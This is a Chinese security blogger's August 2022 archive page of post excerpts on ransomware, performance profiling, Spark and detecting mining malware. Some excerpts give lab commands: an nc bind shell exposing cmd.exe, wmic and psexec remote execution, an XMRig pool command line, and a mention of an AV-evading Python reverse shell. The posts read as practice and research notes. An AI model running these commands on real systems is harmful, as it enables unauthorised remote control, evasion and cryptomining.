• 博客园logo
  • 会员
  • 周边
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
将者,智、信、仁、勇、严也。
Hi,我是李智华,华为-安全AI算法专家,欢迎来到安全攻防对抗的有趣世界。
博客园    首页    新随笔    联系   管理    订阅  订阅
08 2022 档案
Windows Sever 2008 备份与恢复

摘要:Windows Sever 2008 备份与恢复 目录 前言 一、实验环境 二、实验步骤 总结 前言 作为一名企业的管理员,对于一些相当重要的文件,或所存储的磁盘以及系统,为 了防止丢失,我们可以使用服务器所添加的功能(Windows Server Backup)来进行备份与恢复。 一、实验环境 此 阅读全文
posted @ 2022-08-30 22:57 bonelee 阅读(1226) 评论(0) 推荐(0)
Tellyouthepass勒索

摘要:与Tellyouthepass勒索感染? 需要解密文件吗? 什么是Tellyouthepass勒索 如今大局;文章是关于Tellyouthepass cryptovirus并且在今年三月份的最后一个星期开始流行. 这是一个涉及到您的计算机病毒隐蔽加密的各种格式的用户数据, 如office文档, 视频 阅读全文
posted @ 2022-08-30 16:14 bonelee 阅读(767) 评论(0) 推荐(0)
疑似借助用友畅捷通T+的勒索攻击爆发 火绒安全可查杀

摘要:疑似借助用友畅捷通T+的勒索攻击爆发 火绒安全可查杀 https://www.huorong.cn/info/1661778944884.html 2022-08-29 1576次阅读 火绒安全实验室监测,疑似借助用友畅捷通T+传播的勒索病毒模块异常活跃(FakeTplus病毒)。火绒工程师排查某勒 阅读全文
posted @ 2022-08-30 10:46 bonelee 阅读(290) 评论(0) 推荐(0)
从实际勒索看业内勒索解密的软件 都不是很好用!

摘要:下载一个360解密大师: 发现对2个勒索加密的文件没什么卵用啊! 使用下腾讯管家: 一看这描述,还是20年的。。。尼玛,绝对是不行的节奏啊。。。 果不其然。。。坑。。。 再看下深信服的: 上传了一个文件, gg了,也不行!!! 那个报告内容,也对不上我的。。。 全球最大铝生产商挪威海德鲁(Norsk 阅读全文
posted @ 2022-08-29 23:26 bonelee 阅读(87) 评论(0) 推荐(0)
Windows 提权方式总结

摘要:Windows 提权方式总结 from: https://www.geekby.site/2021/01/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/ Windows 提权方式总结 1 前言 1.1 提权基础命令 1 2 阅读全文
posted @ 2022-08-24 12:53 bonelee 阅读(2724) 评论(1) 推荐(1)
初级排序算法分析

摘要:初级排序算法分析 1,选择排序 2, 插入排序 3, 冒泡排序 4, 归并排序 5, 快速排序 6, 堆排序 前言 正文 一, 选择排序 选择排序是排序中最简单的排序算法,它的操作是这样的: 首先找到数组中最小那个的元素,其次,将它和数组的第一个元素交换位置(如果第一个元素就是最小元素那么它就和自己 阅读全文
posted @ 2022-08-24 09:26 bonelee 阅读(54) 评论(0) 推荐(0)
tls1.3 可以看到client hello所有内容,还有一半的server hello,是看不到证书issuer、subject等信息的

摘要:https://www.cloudshark.org/captures/64d433b1585a 看到tls1.3 client hello 内容: Secure Sockets Layer TLSv1.3 Record Layer: Handshake Protocol: Client Hello 阅读全文
posted @ 2022-08-23 20:20 bonelee 阅读(634) 评论(1) 推荐(0)
google gson解析json示例

摘要:public class User { //省略其它 public String name; public int age; public String emailAddress; } private void testGson() { Gson gson = new Gson(); String 阅读全文
posted @ 2022-08-18 09:28 bonelee 阅读(43) 评论(0) 推荐(0)
Drools 入门案例——手把手教你

摘要:Drools入门案例# 业务场景说明# 业务场景:消费者在图书商城购买图书,下单后需要在支付页面显示订单优惠后的价格。具体优惠规则如下: 规则编号规则名称描述 1 规则一 所购图书总价在100元以下的没有优惠 2 规则二 所购图书总价在100到200元的优惠20元 3 规则三 所购图书总价在200到 阅读全文
posted @ 2022-08-16 11:13 bonelee 阅读(291) 评论(0) 推荐(0)
火绒剑开启网络监控还是好用的!

摘要: 阅读全文
posted @ 2022-08-14 22:37 bonelee 阅读(220) 评论(0) 推荐(0)
PySpark 各种姿势的join连接

摘要:参考:https://sparkbyexamples.com/pyspark/pyspark-join-explained-with-examples/ 1. PySpark 连接语法 PySpark SQL 连接具有以下语法,可以直接从 DataFrame 访问。 join(self, other 阅读全文
posted @ 2022-08-12 10:33 bonelee 阅读(4140) 评论(0) 推荐(0)
spark dataframe的分分合合 - join和select分割

摘要:emp = [(1,"Smith",-1,"2018","10","M",3000), \ (2,"Rose",1,"2010","20","M",4000), \ (3,"Williams",1,"2010","10","M",1000), \ (4,"Jones",2,"2005","10",& 阅读全文
posted @ 2022-08-12 10:32 bonelee 阅读(164) 评论(0) 推荐(0)
spark将dataframe按照比例分割为2份方法

摘要:import pyspark # importing sparksession from pyspark.sql module from pyspark.sql import SparkSession def split2df(prod_df, ratio=0.8): # Calculate cou 阅读全文
posted @ 2022-08-11 22:10 bonelee 阅读(609) 评论(0) 推荐(0)
Bypass User Account Control

摘要:Subtechniques T1548.002 «Bypass User Account Control» Permissions requied: Administrator, User Data sources: Windows Registry, Process command-line pa 阅读全文
posted @ 2022-08-10 12:11 bonelee 阅读(71) 评论(0) 推荐(0)
运行mem-data-analysis-framework

摘要:下载:wget https://mem:xxxx@alcatraz.net.in.tum.de/mem-prototype/mem-data-analysis-framework.tar.gzdocker load <mem-data-analysis-framework.tar.gzdocker 阅读全文
posted @ 2022-08-06 11:12 bonelee 阅读(46) 评论(1) 推荐(0)
矿池列表汇总

摘要:https://miningpoolhub.com/?page=home&normalize=amd https://www.zhujidaba.com/poolist.html 矿池列表 比特币Bitcoin(BTC)矿池信息整理 矿池名称挖矿模式矿池手续费矿池地址及端口备注 Antpool(蚂蚁 阅读全文
posted @ 2022-08-04 16:35 bonelee 阅读(4203) 评论(0) 推荐(0)
使用英特尔 VTune Profiler 进行挖矿CPU指令数据分析

摘要:门罗币挖矿指令: Collection and Platform Info Application Command Line: D:\share\xmrig-6.18.0-msvc-win64\xmrig-6.18.0\xmrig.exe -o fr.minexmr.com:443 -u 4971q 阅读全文
posted @ 2022-08-03 00:14 bonelee 阅读(1243) 评论(0) 推荐(0)
Intel® VTune™ Profiler ——异常检测,没有感觉到惊艳,性能的话还是热点分析更好用,另外microarch 分析可以深入cpu看性能问题

摘要:一开始需要安装一个driver! Install the Sampling Drivers for Windows* Targets To install the drivers on Windows* 7 (deprecated) and Windows* Server 2008 R2 opera 阅读全文
posted @ 2022-08-02 23:20 bonelee 阅读(463) 评论(0) 推荐(0)
英特尔® VTune™ Profiler 用户指南——程序性能异常检测分析

摘要:https://www.intel.com/content/www/us/en/develop/documentation/vtune-help/top/analyze-performance/algorithm-group/anomaly-detection-analysis.html 异常检测分 阅读全文
posted @ 2022-08-02 20:07 bonelee 阅读(721) 评论(0) 推荐(0)
Call stack 调用栈理解

摘要:我们在上课讲到递归函数调用的空间复杂度的时候曾多次提到过call stack的概念,然而很多同学表示不太清楚。今天我们就来讲一下call stack是什么。相信有了上一篇文章对virtual memory的介绍之后,同学们理解起Call stack来会相对容易一些。 Call Stack 是什么? 阅读全文
posted @ 2022-08-02 14:55 bonelee 阅读(379) 评论(0) 推荐(0)
性能分析工具 VTuneAmplifier

摘要:性能分析工具 大量的可用于性能测量的工具可以说明性能测量的重要性。有的性能分析工具支持采样和基于编译器的应用程序性能分析,有时还具有上下文相关的调用图功能。有的工具则支持基于硬件事件的非侵入式且开销较低的采样和分析。还有的工具会利用现代微处理器提供的硬件性能计数器。部分工具可以发现与数据局部性、缓存 阅读全文
posted @ 2022-08-02 11:49 bonelee 阅读(1042) 评论(0) 推荐(0)
使用 Perf 进行基于硬件的性能监视——intel PMU,针对Suse linux

摘要:使用 Perf 进行基于硬件的性能监视 REPORT DOCUMENTATION BUG# 是针对Suse的:https://documentation.suse.com/zh-cn/sles/15-SP2/html/SLES-all/cha-perf.html 摘要REPORT DOCUMENTA 阅读全文
posted @ 2022-08-02 11:22 bonelee 阅读(786) 评论(0) 推荐(0)
从上到下的系统架构分析方法 - Intel PMU

摘要:从上到下的系统架构分析方法 - Intel PMU Andi Cleen 等 云巅论剑 2019-03-19 18:08 https://mp.weixin.qq.com/s/WLasOy9oZvTptEV5050PFQ Top-down Microarchitecture Analysis Met 阅读全文
posted @ 2022-08-02 11:17 bonelee 阅读(643) 评论(0) 推荐(0)
Intel TDT检测 & PMU数据采集分析——todo,待使用实际恶意样本跑数据分析效果

摘要:背景: Intel TDT检测:英特尔®威胁检测技术(TDT),使用 GPU 扫描内存中的恶意软件,GPU加速,CPU 利用率从 20%降至 2%。 挖矿检测:PMU监视的重复数学计算,当恶意软件的算力达到某个阈值时,PMU就会生成预警信号,由机器学习引擎进行分析,确定该活动是否与加密货币矿工相关。 阅读全文
posted @ 2022-08-02 10:05 bonelee 阅读(1043) 评论(0) 推荐(0)
python 实现nc功能 免杀案例——的确可以绕过奇安信,defender这些edr

摘要:这里仅用反弹powershell演示,大家可以发挥脑洞 自创反弹shell免杀五部曲: 1:确定想法 2:实现框架 3:增加保护 4:启动木马 5:维持会话或提权 1|2一,确定想法 用python服务器与客户端的原理制作反弹shell的控制端与被控制端, 最后执行在会话中执行恶意命令来获取一个稳定 阅读全文
posted @ 2022-08-01 16:55 bonelee 阅读(847) 评论(0) 推荐(0)
nc远控反弹shell小实践

摘要:正向shell: 132机器A上:==>是c2的client nc.exe -L -d -e cmd.exe -p 5555 134机器B上: nc64.exe XXX.132 5555 然后就可以输入命令远控132机器了! 我的nc都放在了桌面,所以在桌面cmd即可! 反弹shell例子: 134 阅读全文
posted @ 2022-08-01 16:40 bonelee 阅读(392) 评论(0) 推荐(0)
psexec远程执行命令实践

摘要:最终效果: C:\Users\PSTools>psexec \\XXXIP -u XXX -p XXX -i cmd.exe PsExec v2.4 - Execute processes remotely Copyright (C) 2001-2022 Mark Russinovich Sysin 阅读全文
posted @ 2022-08-01 14:59 bonelee 阅读(1551) 评论(0) 推荐(0)
win10系统中运行wmic 远程执行命令的方法

摘要:背景:wmic 运行时候出现拒绝访问错误: wmic /node:xxxIP /user:xxx /password:xxx process call create "cmd.exe /c ipconfig>c:\users\xxx\result.txt" 错误: 描述 = 拒绝访问。 解决方法如下 阅读全文
posted @ 2022-08-01 11:47 bonelee 阅读(4132) 评论(0) 推荐(0)

博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3